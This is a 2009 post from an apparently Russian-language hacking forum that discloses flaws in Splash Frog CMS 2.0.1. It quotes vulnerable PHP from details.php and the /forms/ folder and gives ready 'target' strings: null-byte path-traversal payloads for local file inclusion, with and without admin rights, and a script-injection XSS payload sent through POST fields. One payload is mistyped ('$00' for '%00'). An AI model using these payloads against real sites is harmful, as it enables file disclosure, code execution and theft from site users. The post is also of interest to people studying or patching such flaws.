09.12.2009, 00:56
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Product: Splash Frog CMS
Author: http://www.twinleafstudios.net/
Version: 2.0.1
LFI
file: details.php
/*треуються права админа*/
PHP код:
function main_content() {
if(empty($_GET['sec']))
{ header("Location: main.php"); exit; }
if(!empty($_SESSION['SplashFrog_ViewSite'])) {
if(($_SESSION['SplashFrog_SiteAdmin'] != '1') && (!in_array($_SESSION['SplashFrog_ViewSite'], $_SESSION['SplashFrog_SiteID'])))
{ echo '<p class="error">You do not have permission to view this site.</p>'; return; }
}
if(file_exists("section/".$_GET['sec'].".php"))
{ include_once("section/".$_GET['sec'].".php"); }
else
{ echo '<p class="error">Unable to access the selected section.</p>'; }
}
PHP код:
<?php if(function_exists(main_content)) { echo main_content(); } ?>
target: ?sec=../../../file.php%00
/*без прав админа*/
file: details.php
PHP код:
function main_submenu() {
if(file_exists("submenu/".$_GET['sec'].".php"))
{ include_once("submenu/".$_GET['sec'].".php"); }
}
Вызываеться в файле:
file: /template/tmpl2.php
PHP код:
<?php if(function_exists(main_submenu)) { echo main_submenu(); } ?>
target: ?sec=../../../file.php$00
XSS
В папке /forms/ уязвим почти каждый файл.пример:
file: /forms/admin/admin.php
PHP код:
<input type="hidden" name="adminID" value="<?=$_POST['adminID'];?>" />
<input type="hidden" name="curUsername" id="curUsername" value="<?=$_POST['username'];?>" />
<input type="hidden" name="curEmail" id="curEmail" value="<?=$_POST['email'];?>" />
target: {POST} ?username="><script>alert('hacker');</script>
|
|
|